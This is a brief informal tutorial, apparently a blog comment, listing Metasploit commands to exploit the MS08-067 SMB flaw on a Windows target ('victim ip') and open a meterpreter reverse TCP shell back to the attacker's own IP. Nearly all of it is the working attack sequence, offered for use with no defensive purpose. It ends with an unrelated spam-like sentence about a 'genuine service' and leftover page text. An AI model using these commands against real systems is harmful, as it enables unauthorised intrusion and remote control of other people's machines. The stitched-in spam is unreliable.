This tut can be executed using kali linux metaexploit
open msfconsole in kali cmd
use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your ip address(type ifconfig to check ur ip)
set LPORT 4444
set RHOST victim ip
set RPORT 445
exploit
(you should connect)
type help for a list of commands
When you use a genuine service, you will be able to provide instructions, share materials and choose the formatting style. linux fo hacking
ReplyDelete